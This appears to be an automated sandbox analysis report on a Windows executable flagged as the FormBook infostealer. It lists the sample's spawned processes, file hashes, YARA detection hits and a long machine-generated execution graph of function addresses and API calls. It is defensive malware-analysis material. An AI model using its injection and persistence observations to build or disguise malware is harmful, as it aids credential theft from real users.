                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body
                                                                                      Dec 2, 2024 14:34:38.077157021 CET9INData Raw: 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: ></html>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:08:30:39
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Users\user\Desktop\CCE 30411252024.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CCE 30411252024.exe"
                                                                                      Imagebase:0xee0000
                                                                                      File size:1'191'424 bytes
                                                                                      MD5 hash:ACE5B81F6392CA5CE9A2E0953E6D6E4E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:08:30:41
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CCE 30411252024.exe"
                                                                                      Imagebase:0xb80000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:08:30:49
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe"
                                                                                      Imagebase:0x60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:08:30:50
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                      Imagebase:0xfa0000
                                                                                      File size:22'016 bytes
                                                                                      MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:08:31:05
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe"
                                                                                      Imagebase:0x60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:08:31:18
                                                                                      Start date:02/12/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff728280000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.8%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:7.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:67
                                                                                        execution_graph 93089 f59c06 93100 efd3be 93089->93100 93091 f59c1c 93099 f59c91 Mailbox 93091->93099 93181 ee1caa 49 API calls 93091->93181 93094 f59cc5 93096 f5a7ab Mailbox 93094->93096 93183 f2cc5c 86 API calls 4 library calls 93094->93183 93097 f59c71 93097->93094 93182 f2b171 48 API calls 93097->93182 93109 ef3200 93099->93109 93101 efd3dc 93100->93101 93102 efd3ca 93100->93102 93104 efd40b 93101->93104 93105 efd3e2 93101->93105 93184 eedcae 50 API calls Mailbox 93102->93184 93194 eedcae 50 API calls Mailbox 93104->93194 93185 eff4ea 93105->93185 93108 efd3d4 93108->93091 93217 eebd30 93109->93217 93111 ef3267 93113 ef32f8 93111->93113 93114 f5907a 93111->93114 93171 ef3628 93111->93171 93290 efc36b 86 API calls 93113->93290 93325 f2cc5c 86 API calls 4 library calls 93114->93325 93118 ef3313 93169 ef34eb Mailbox ___crtGetEnvironmentStringsW 93118->93169 93118->93171 93174 f594df 93118->93174 93222 ee2b7a 93118->93222 93119 f591fa 93340 f2cc5c 86 API calls 4 library calls 93119->93340 93123 f5909a 93123->93119 93326 eed645 93123->93326 93124 f593c5 93126 eefe30 331 API calls 93124->93126 93125 f5926d 93344 f2cc5c 86 API calls 4 library calls 93125->93344 93129 f59407 93126->93129 93129->93171 93349 eed6e9 93129->93349 93132 f59114 93145 f59128 93132->93145 93155 f59152 93132->93155 93133 f59220 93341 ee1caa 49 API calls 93133->93341 93135 ef33ce 93139 ef3465 93135->93139 93140 f5945e 93135->93140 93135->93169 93147 eff4ea 48 API calls 93139->93147 93354 f2c942 50 API calls 93140->93354 93142 f59438 93353 f2cc5c 86 API calls 4 library calls 93142->93353 93143 f5923d 93148 f59252 93143->93148 93149 f5925e 93143->93149 93336 f2cc5c 86 API calls 4 library calls 93145->93336 93158 ef346c 93147->93158 93342 f2cc5c 86 API calls 4 library calls 93148->93342 93343 f2cc5c 86 API calls 4 library calls 93149->93343 93151 efc3c3 48 API calls 93151->93169 93156 f59177 93155->93156 93160 f59195 93155->93160 93337 f3f320 331 API calls 93156->93337 93165 ef351f 93158->93165 93229 eee8d0 93158->93229 93161 f5918b 93160->93161 93338 f3f5ee 331 API calls 93160->93338 93161->93171 93339 efc2d6 48 API calls ___crtGetEnvironmentStringsW 93161->93339 93163 eff4ea 48 API calls 93163->93169 93168 ef3540 93165->93168 93355 ee6eed 93165->93355 93168->93171 93175 f594b0 93168->93175 93179 ef3585 93168->93179 93169->93123 93169->93124 93169->93125 93169->93142 93169->93151 93169->93163 93169->93165 93170 f59394 93169->93170 93169->93171 93292 eed9a0 53 API calls __cinit 93169->93292 93293 eed8c0 53 API calls 93169->93293 93294 efc2d6 48 API calls ___crtGetEnvironmentStringsW 93169->93294 93295 eefe30 93169->93295 93345 f3cda2 82 API calls Mailbox 93169->93345 93346 f280e3 53 API calls 93169->93346 93347 eed764 55 API calls 93169->93347 93348 eedcae 50 API calls Mailbox 93169->93348 93173 eff4ea 48 API calls 93170->93173 93180 ef3635 Mailbox 93171->93180 93324 f2cc5c 86 API calls 4 library calls 93171->93324 93173->93124 93174->93171 93360 f2cc5c 86 API calls 4 library calls 93174->93360 93359 eedcae 50 API calls Mailbox 93175->93359 93177 ef3615 93291 eedcae 50 API calls Mailbox 93177->93291 93179->93171 93179->93174 93179->93177 93180->93094 93181->93097 93182->93099 93183->93096 93184->93108 93188 eff4f2 __calloc_impl 93185->93188 93187 eff50c 93187->93108 93188->93187 93189 eff50e std::exception::exception 93188->93189 93195 f0395c 93188->93195 93209 f06805 RaiseException 93189->93209 93191 eff538 93210 f0673b 47 API calls _free 93191->93210 93193 eff54a 93193->93108 93194->93108 93196 f039d7 __calloc_impl 93195->93196 93206 f03968 __calloc_impl 93195->93206 93216 f07c0e 47 API calls __getptd_noexit 93196->93216 93199 f0399b RtlAllocateHeap 93200 f039cf 93199->93200 93199->93206 93200->93188 93202 f039c3 93214 f07c0e 47 API calls __getptd_noexit 93202->93214 93205 f03973 93205->93206 93211 f081c2 47 API calls __NMSG_WRITE 93205->93211 93212 f0821f 47 API calls 6 library calls 93205->93212 93213 f01145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93205->93213 93206->93199 93206->93202 93206->93205 93207 f039c1 93206->93207 93215 f07c0e 47 API calls __getptd_noexit 93207->93215 93209->93191 93210->93193 93211->93205 93212->93205 93214->93207 93215->93200 93216->93200 93218 eebd3f 93217->93218 93221 eebd5a 93217->93221 93361 eebdfa 93218->93361 93220 eebd47 CharUpperBuffW 93220->93221 93221->93111 93223 ee2b8b 93222->93223 93224 f5436a 93222->93224 93225 eff4ea 48 API calls 93223->93225 93226 ee2b92 93225->93226 93227 ee2bb3 93226->93227 93378 ee2bce 48 API calls 93226->93378 93227->93135 93230 eee8f6 93229->93230 93253 eee906 Mailbox 93229->93253 93232 eeed52 93230->93232 93230->93253 93231 f2cc5c 86 API calls 93231->93253 93473 efe3cd 331 API calls 93232->93473 93234 eeebc7 93235 eeebdd 93234->93235 93474 ee2ff6 16 API calls 93234->93474 93235->93169 93237 eeed63 93237->93235 93239 eeed70 93237->93239 93238 eee94c PeekMessageW 93238->93253 93475 efe312 331 API calls Mailbox 93239->93475 93241 f5526e Sleep 93241->93253 93242 eeed77 LockWindowUpdate DestroyWindow GetMessageW 93242->93235 93244 eeeda9 93242->93244 93246 f559ef TranslateMessage DispatchMessageW GetMessageW 93244->93246 93246->93246 93247 f55a1f 93246->93247 93247->93235 93248 eeed21 PeekMessageW 93248->93253 93249 eff4ea 48 API calls 93249->93253 93250 eeebf7 timeGetTime 93250->93253 93252 ee6eed 48 API calls 93252->93253 93253->93231 93253->93234 93253->93238 93253->93241 93253->93248 93253->93249 93253->93250 93253->93252 93254 f55557 WaitForSingleObject 93253->93254 93255 eeed3a TranslateMessage DispatchMessageW 93253->93255 93257 f5588f Sleep 93253->93257 93259 eeedae timeGetTime 93253->93259 93261 f55733 Sleep 93253->93261 93264 f55429 Mailbox 93253->93264 93267 ee2aae 307 API calls 93253->93267 93269 f55445 Sleep 93253->93269 93277 ee1caa 49 API calls 93253->93277 93282 eefe30 307 API calls 93253->93282 93286 ef3200 307 API calls 93253->93286 93288 eed6e9 55 API calls 93253->93288 93289 eece19 48 API calls 93253->93289 93379 eef110 93253->93379 93444 ef45e0 93253->93444 93461 efe244 93253->93461 93466 efdc5f 93253->93466 93471 eeeed0 331 API calls Mailbox 93253->93471 93472 eeef00 331 API calls 93253->93472 93477 f48d23 48 API calls 93253->93477 93254->93253 93258 f55574 GetExitCodeProcess CloseHandle 93254->93258 93255->93248 93257->93264 93258->93253 93476 ee1caa 49 API calls 93259->93476 93261->93264 93262 efdc38 timeGetTime 93262->93264 93264->93253 93264->93262 93268 f55926 GetExitCodeProcess 93264->93268 93264->93269 93272 f55432 Sleep 93264->93272 93273 f48c4b 108 API calls 93264->93273 93274 ee2c79 107 API calls 93264->93274 93276 f559ae Sleep 93264->93276 93283 eed6e9 55 API calls 93264->93283 93478 eed7f7 93264->93478 93483 f24cbe 49 API calls Mailbox 93264->93483 93484 ee1caa 49 API calls 93264->93484 93485 eece19 93264->93485 93491 ee2aae 331 API calls 93264->93491 93492 f3ccb2 50 API calls 93264->93492 93493 f27a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93264->93493 93494 f26532 63 API calls 3 library calls 93264->93494 93267->93253 93270 f55952 CloseHandle 93268->93270 93271 f5593c WaitForSingleObject 93268->93271 93269->93253 93270->93264 93271->93253 93271->93270 93272->93269 93273->93264 93274->93264 93276->93253 93277->93253 93282->93253 93283->93264 93286->93253 93288->93253 93289->93253 93290->93118 93291->93171 93292->93169 93293->93169 93294->93169 93296 eefe50 93295->93296 93320 eefe7e 93295->93320 93297 eff4ea 48 API calls 93296->93297 93297->93320 93298 ef146e 93299 ee6eed 48 API calls 93298->93299 93321 eeffe1 93299->93321 93300 ef0509 94412 f2cc5c 86 API calls 4 library calls 93300->94412 93304 eff4ea 48 API calls 93304->93320 93305 ef1473 94411 f2cc5c 86 API calls 4 library calls 93305->94411 93306 f5a246 93309 ee6eed 48 API calls 93306->93309 93307 f5a922 93307->93169 93309->93321 93311 ee6eed 48 API calls 93311->93320 93312 f5a873 93312->93169 93313 eed7f7 48 API calls 93313->93320 93314 f197ed InterlockedDecrement 93314->93320 93315 f5a30e 93315->93321 94409 f197ed InterlockedDecrement 93315->94409 93316 f00f0a 52 API calls __cinit 93316->93320 93318 f5a973 94413 f2cc5c 86 API calls 4 library calls 93318->94413 93320->93298 93320->93300 93320->93304 93320->93305 93320->93306 93320->93311 93320->93313 93320->93314 93320->93315 93320->93316 93320->93318 93320->93321 93323 ef15b5 93320->93323 94407 ef1820 331 API calls 2 library calls 93320->94407 94408 ef1d10 59 API calls Mailbox 93320->94408 93321->93169 93322 f5a982 94410 f2cc5c 86 API calls 4 library calls 93323->94410 93324->93180 93325->93118 93327 eed654 93326->93327 93334 eed67e 93326->93334 93328 eed65b 93327->93328 93331 eed6c2 93327->93331 93329 eed666 93328->93329 93335 eed6ab 93328->93335 94414 eed9a0 53 API calls __cinit 93329->94414 93331->93335 94416 efdce0 53 API calls 93331->94416 93334->93132 93334->93133 93335->93334 94415 efdce0 53 API calls 93335->94415 93336->93171 93337->93161 93338->93161 93339->93119 93340->93171 93341->93143 93342->93171 93343->93171 93344->93171 93345->93169 93346->93169 93347->93169 93348->93169 93350 eed6f4 93349->93350 93352 eed71b 93350->93352 94417 eed764 55 API calls 93350->94417 93352->93142 93353->93171 93354->93165 93356 ee6ef8 93355->93356 93357 ee6f00 93355->93357 94418 eedd47 48 API calls ___crtGetEnvironmentStringsW 93356->94418 93357->93168 93359->93174 93360->93171 93362 eebe0d 93361->93362 93366 eebe0a ___crtGetEnvironmentStringsW 93361->93366 93363 eff4ea 48 API calls 93362->93363 93364 eebe17 93363->93364 93367 efee75 93364->93367 93366->93220 93369 eff4ea __calloc_impl 93367->93369 93368 f0395c __crtLCMapStringA_stat 47 API calls 93368->93369 93369->93368 93370 eff50c 93369->93370 93371 eff50e std::exception::exception 93369->93371 93370->93366 93376 f06805 RaiseException 93371->93376 93373 eff538 93377 f0673b 47 API calls _free 93373->93377 93375 eff54a 93375->93366 93376->93373 93377->93375 93378->93227 93380 eef130 93379->93380 93381 eefe30 331 API calls 93380->93381 93385 eef199 93380->93385 93383 f58728 93381->93383 93382 eef595 93390 eed7f7 48 API calls 93382->93390 93398 eef431 Mailbox 93382->93398 93383->93385 93512 f2cc5c 86 API calls 4 library calls 93383->93512 93384 f587c8 93515 f2cc5c 86 API calls 4 library calls 93384->93515 93385->93382 93392 eed7f7 48 API calls 93385->93392 93404 eef229 93385->93404 93433 eef3dd 93385->93433 93386 eefe30 331 API calls 93386->93398 93387 eef418 93394 f58b1b 93387->93394 93387->93398 93429 eef6aa 93387->93429 93391 f587a3 93390->93391 93514 f00f0a 52 API calls __cinit 93391->93514 93395 f58772 93392->93395 93393 eef3f2 93393->93387 93516 f29af1 48 API calls 93393->93516 93415 f58b2c 93394->93415 93416 f58bcf 93394->93416 93513 f00f0a 52 API calls __cinit 93395->93513 93398->93386 93401 eef537 Mailbox 93398->93401 93402 eed6e9 55 API calls 93398->93402 93403 f58b7e 93398->93403 93406 f58c53 93398->93406 93409 f2cc5c 86 API calls 93398->93409 93414 efc1af 48 API calls 93398->93414 93417 f58beb 93398->93417 93418 ef1b90 48 API calls 93398->93418 93425 eefce0 93398->93425 93511 eedd47 48 API calls ___crtGetEnvironmentStringsW 93398->93511 93526 f197ed InterlockedDecrement 93398->93526 93399 eef770 93405 f58a45 93399->93405 93424 eef77a 93399->93424 93401->93253 93402->93398 93528 f3e40a 331 API calls Mailbox 93403->93528 93404->93382 93404->93387 93404->93398 93404->93433 93522 efc1af 93405->93522 93533 f2cc5c 86 API calls 4 library calls 93406->93533 93407 f58810 93517 f3eef8 331 API calls 93407->93517 93408 eefe30 331 API calls 93408->93429 93409->93398 93414->93398 93527 f3f5ee 331 API calls 93415->93527 93530 f2cc5c 86 API calls 4 library calls 93416->93530 93531 f3bdbd 331 API calls Mailbox 93417->93531 93418->93398 93423 f58c00 93423->93401 93532 f2cc5c 86 API calls 4 library calls 93423->93532 93495 ef1b90 93424->93495 93425->93401 93529 f2cc5c 86 API calls 4 library calls 93425->93529 93429->93398 93429->93399 93429->93401 93429->93408 93429->93425 93430 f58823 93430->93387 93431 f5884b 93430->93431 93518 f3ccdc 48 API calls 93431->93518 93433->93384 93433->93393 93433->93398 93434 f58857 93436 f58865 93434->93436 93437 f588aa 93434->93437 93519 f29b72 48 API calls 93436->93519 93441 f588a0 Mailbox 93437->93441 93520 f2a69d 48 API calls 93437->93520 93438 eefe30 331 API calls 93438->93401 93441->93438 93442 f588e7 93521 eebc74 48 API calls 93442->93521 93445 ef479f 93444->93445 93446 ef4637 93444->93446 93449 eece19 48 API calls 93445->93449 93447 f56e05 93446->93447 93448 ef4643 93446->93448 93596 f3e822 93447->93596 93595 ef4300 331 API calls ___crtGetEnvironmentStringsW 93448->93595 93456 ef46e4 Mailbox 93449->93456 93452 f56e11 93453 ef4739 Mailbox 93452->93453 93636 f2cc5c 86 API calls 4 library calls 93452->93636 93453->93253 93455 ef4659 93455->93452 93455->93453 93455->93456 93536 f36ff0 93456->93536 93545 ee4252 93456->93545 93551 f2fa0c 93456->93551 93592 f26524 93456->93592 93463 f5df42 93461->93463 93465 efe253 93461->93465 93462 f5df77 93463->93462 93464 f5df59 TranslateAcceleratorW 93463->93464 93464->93465 93465->93253 93467 efdca3 93466->93467 93468 efdc71 93466->93468 93467->93253 93468->93467 93469 efdc96 IsDialogMessageW 93468->93469 93470 f5dd1d GetClassLongW 93468->93470 93469->93467 93469->93468 93470->93468 93470->93469 93471->93253 93472->93253 93473->93234 93474->93237 93475->93242 93476->93253 93477->93253 93479 eff4ea 48 API calls 93478->93479 93480 eed818 93479->93480 93481 eff4ea 48 API calls 93480->93481 93482 eed826 93481->93482 93482->93264 93483->93264 93484->93264 93486 eece28 __wsetenvp 93485->93486 93487 efee75 48 API calls 93486->93487 93488 eece50 ___crtGetEnvironmentStringsW 93487->93488 93489 eff4ea 48 API calls 93488->93489 93490 eece66 93489->93490 93490->93264 93491->93264 93492->93264 93493->93264 93494->93264 93496 ef1cf6 93495->93496 93497 ef1ba2 93495->93497 93496->93398 93499 eff4ea 48 API calls 93497->93499 93510 ef1bae 93497->93510 93500 f549c4 93499->93500 93502 eff4ea 48 API calls 93500->93502 93501 ef1c5d 93501->93398 93509 f549cf 93502->93509 93503 ef1bb9 93503->93501 93504 eff4ea 48 API calls 93503->93504 93505 ef1c9f 93504->93505 93506 ef1cb2 93505->93506 93534 ee2925 48 API calls 93505->93534 93506->93398 93508 eff4ea 48 API calls 93508->93509 93509->93508 93509->93510 93510->93503 93535 efc15c 48 API calls 93510->93535 93511->93398 93512->93385 93513->93404 93514->93398 93515->93401 93516->93407 93517->93430 93518->93434 93519->93441 93520->93442 93521->93441 93523 efc1b8 93522->93523 93525 efc1c7 93522->93525 93524 eff4ea 48 API calls 93523->93524 93524->93525 93525->93398 93526->93398 93527->93398 93528->93425 93529->93401 93530->93401 93531->93423 93532->93401 93533->93401 93534->93506 93535->93503 93637 ee936c 93536->93637 93538 f3702a 93657 eeb470 93538->93657 93540 f3705f 93544 f37063 93540->93544 93685 eecdb9 48 API calls 93540->93685 93541 f3703a 93541->93540 93542 eefe30 331 API calls 93541->93542 93542->93540 93544->93453 93546 ee425c 93545->93546 93547 ee4263 93545->93547 93716 f035e4 93546->93716 93549 ee4272 93547->93549 93550 ee4283 FreeLibrary 93547->93550 93549->93453 93550->93549 93552 f2fa1c __ftell_nolock 93551->93552 93553 f2fa44 93552->93553 94105 eed286 48 API calls 93552->94105 93555 ee936c 81 API calls 93553->93555 93556 f2fa5e 93555->93556 93557 f2fa80 93556->93557 93558 f2fb68 93556->93558 93567 f2fb92 93556->93567 93559 ee936c 81 API calls 93557->93559 94022 ee41a9 93558->94022 93566 f2fa8c _wcscpy _wcschr 93559->93566 93562 f2fb8e 93563 ee936c 81 API calls 93562->93563 93562->93567 93565 f2fbc7 93563->93565 93564 ee41a9 136 API calls 93564->93562 94046 f01dfc 93565->94046 93571 f2fab0 _wcscat _wcscpy 93566->93571 93575 f2fade _wcscat 93566->93575 93567->93453 93569 ee936c 81 API calls 93570 f2fafc _wcscpy 93569->93570 94106 f272cb GetFileAttributesW 93570->94106 93572 ee936c 81 API calls 93571->93572 93572->93575 93574 f2fb1c __wsetenvp 93574->93567 93577 ee936c 81 API calls 93574->93577 93575->93569 93576 f2fbeb _wcscat _wcscpy 93580 ee936c 81 API calls 93576->93580 93578 f2fb48 93577->93578 94107 f260dd 77 API calls 4 library calls 93578->94107 93582 f2fc82 93580->93582 93581 f2fb5c 93581->93567 94049 f2690b 93582->94049 93584 f2fca2 93585 f26524 3 API calls 93584->93585 93586 f2fcb1 93585->93586 93587 ee936c 81 API calls 93586->93587 93590 f2fce2 93586->93590 93588 f2fccb 93587->93588 94055 f2bfa4 93588->94055 93591 ee4252 84 API calls 93590->93591 93591->93567 94395 f26ca9 GetFileAttributesW 93592->94395 93595->93455 93597 f3e868 93596->93597 93598 f3e84e 93596->93598 94400 f3ccdc 48 API calls 93597->94400 94399 f2cc5c 86 API calls 4 library calls 93598->94399 93601 f3e871 93602 eefe30 330 API calls 93601->93602 93603 f3e8cf 93602->93603 93604 f3e96a 93603->93604 93605 f3e916 93603->93605 93635 f3e860 Mailbox 93603->93635 93606 f3e978 93604->93606 93610 f3e9c7 93604->93610 94401 f29b72 48 API calls 93605->94401 94402 f2a69d 48 API calls 93606->94402 93609 f3e949 93612 ef45e0 330 API calls 93609->93612 93613 ee936c 81 API calls 93610->93613 93610->93635 93611 f3e99b 94403 eebc74 48 API calls 93611->94403 93612->93635 93615 f3e9e1 93613->93615 93616 eebdfa 48 API calls 93615->93616 93617 f3ea05 CharUpperBuffW 93616->93617 93619 f3ea1f 93617->93619 93618 f3e9a3 Mailbox 93620 ef3200 330 API calls 93618->93620 93621 f3ea72 93619->93621 93622 f3ea26 93619->93622 93620->93635 93623 ee936c 81 API calls 93621->93623 94404 f29b72 48 API calls 93622->94404 93624 f3ea7a 93623->93624 94405 ee1caa 49 API calls 93624->94405 93627 f3ea54 93628 ef45e0 330 API calls 93627->93628 93628->93635 93629 f3ea84 93630 ee936c 81 API calls 93629->93630 93629->93635 93631 f3ea9f 93630->93631 94406 eebc74 48 API calls 93631->94406 93633 f3eaaf 93634 ef3200 330 API calls 93633->93634 93634->93635 93635->93452 93636->93453 93638 ee9384 93637->93638 93652 ee9380 93637->93652 93639 f54cbd __i64tow 93638->93639 93640 ee9398 93638->93640 93641 f54bbf 93638->93641 93649 ee93b0 __itow Mailbox _wcscpy 93638->93649 93686 f0172b 80 API calls 3 library calls 93640->93686 93642 f54ca5 93641->93642 93643 f54bc8 93641->93643 93687 f0172b 80 API calls 3 library calls 93642->93687 93648 f54be7 93643->93648 93643->93649 93646 eff4ea 48 API calls 93647 ee93ba 93646->93647 93651 eece19 48 API calls 93647->93651 93647->93652 93650 eff4ea 48 API calls 93648->93650 93649->93646 93654 f54c04 93650->93654 93651->93652 93652->93538 93653 eff4ea 48 API calls 93655 f54c2a 93653->93655 93654->93653 93655->93652 93656 eece19 48 API calls 93655->93656 93656->93652 93688 ee6b0f 93657->93688 93659 eeb69b 93700 eeba85 93659->93700 93661 eeb6b5 Mailbox 93661->93541 93664 f5397b 93714 f226bc 88 API calls 4 library calls 93664->93714 93665 eebcce 48 API calls 93676 eeb495 93665->93676 93666 eeba85 48 API calls 93666->93676 93667 eeb9e4 93715 f226bc 88 API calls 4 library calls 93667->93715 93670 f53973 93670->93661 93673 f53989 93674 eeba85 48 API calls 93673->93674 93674->93670 93675 f53909 93710 ee6b4a 93675->93710 93676->93659 93676->93664 93676->93665 93676->93666 93676->93667 93676->93675 93681 eebdfa 48 API calls 93676->93681 93684 f53939 ___crtGetEnvironmentStringsW 93676->93684 93693 eec413 59 API calls 93676->93693 93694 eebb85 93676->93694 93699 eebc74 48 API calls 93676->93699 93708 eec6a5 49 API calls 93676->93708 93709 eec799 48 API calls ___crtGetEnvironmentStringsW 93676->93709 93679 f53914 93683 eff4ea 48 API calls 93679->93683 93682 eeb66c CharUpperBuffW 93681->93682 93682->93676 93683->93684 93713 f226bc 88 API calls 4 library calls 93684->93713 93685->93544 93686->93649 93687->93649 93689 eff4ea 48 API calls 93688->93689 93690 ee6b34 93689->93690 93691 ee6b4a 48 API calls 93690->93691 93692 ee6b43 93691->93692 93692->93676 93693->93676 93695 eebb9b 93694->93695 93698 eebb96 ___crtGetEnvironmentStringsW 93694->93698 93696 f51b77 93695->93696 93697 efee75 48 API calls 93695->93697 93697->93698 93698->93676 93699->93676 93701 eebb25 93700->93701 93706 eeba98 ___crtGetEnvironmentStringsW 93700->93706 93703 eff4ea 48 API calls 93701->93703 93702 eff4ea 48 API calls 93704 eeba9f 93702->93704 93703->93706 93705 eebac8 93704->93705 93707 eff4ea 48 API calls 93704->93707 93705->93661 93706->93702 93707->93705 93708->93676 93709->93676 93711 eff4ea 48 API calls 93710->93711 93712 ee6b54 93711->93712 93712->93679 93713->93670 93714->93673 93715->93670 93717 f035f0 __wsopen_helper 93716->93717 93718 f03604 93717->93718 93720 f0361c 93717->93720 